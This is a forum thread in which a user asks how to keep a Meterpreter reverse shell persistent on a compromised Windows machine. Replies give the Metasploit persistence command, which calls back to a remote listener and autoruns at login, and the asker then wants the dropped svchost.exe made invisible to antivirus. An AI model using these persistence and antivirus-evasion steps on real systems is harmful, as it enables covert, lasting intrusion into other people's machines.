Results 1 to 10 of 10

Thread: how to make a meterpreter reverse shell maintain access ?

  1. #1
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Default how to make a meterpreter reverse shell maintain access ?

    Hello,

    I was wondering about how to maintain access after uploading a meterpreter reverse_shell using metasploit on the attacked machine? i know about metsvc, but it uses a bind shell.

    Any help would be appreciated, thanx in advance.

    Regards

  2. #2
    Member cr1spyj0nes's Avatar
    Join Date
    Sep 2008
    Posts
    164

    Default

    look in /pentest/exploits/framework3/scripts/meterpreter/ for persistance.rb
    I would rather be hated for what i am,
    Then loved for what i am not.

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default

    take a look here:

    w w w . metasploit . com / redmine / issues / 386

    "remove the spaces, I'm not allowed to post URLs yet"

    Adds a persistent VBS payload option (keep running the payload in a loop) via the loop-vbs type in msfencode. Adds a 'persistence' script to allow easy persistent meterpeter agent deployment. "run persistence -h" for help. Sample command line:

    meterpreter> run persistence -r 1.2.3.4 -p 443 -A -X -i 300

    This would install a meterpreter agent that would try to connect to 1.2.3.4:443 once every 300 seconds. This would also start a multi/handler in the background (-A) and make this autorun when any user logs in (-X). In mostscenarios, this works just fine:

    meterpreter> run persistence -A

    This uses your default IP and the default port and immediates handles the next connection, but doesnt install via the registry.
    So, after getting the meterpreter shell type the following:
    Code:
    meterpreter > run persistence -h
    
    OPTIONS:
    
        -A        Automatically start a matching multi/handler to connect to the agent
        -X        Automatically start the agent when the system boots
        -h        This help menu
        -i <opt>  The interval in seconds between each connection attempt
        -p <opt>  The port on the remote host where Metasploit is listening
        -r <opt>  The IP of the system running Metasploit listening for the connect back
    
    
    meterpreter >

    Give it a try, if you fail, just tell me so I can explain better...

  4. #4
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Default

    thanx guys, ill give it a try and let you know.


  5. #5
    Member
    Join Date
    Feb 2010
    Posts
    75

    Default

    nice post thanks

  6. #6
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Default

    Hello,

    sorry for the late reply as i have been busy the past few days. anyway, i tried to run the script : run metsvc after getting a session but im getting this problem:
    [*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service...
    * Installing service metsvc
    Cannot create service (0x00000431)

    meterpreter >

    and when i run the persistence.rb script it works fine, but the anti virus detects a file called svchost.exe.


    any ideas ?

  7. #7

  8. #8
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Default

    thank you, but i did read that.

    any ideas guys?

  9. #9
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by AlinuX View Post
    and when i run the persistence.rb script it works fine, but the anti virus detects a file called svchost.exe.


    any ideas ?
    Turn off your antivirus?
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  10. #10
    Just burned his ISO AlinuX's Avatar
    Join Date
    Jan 2008
    Posts
    8

    Default

    of course it wont get detected, i need it to be undetectable to the anti virus also.

    regards

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •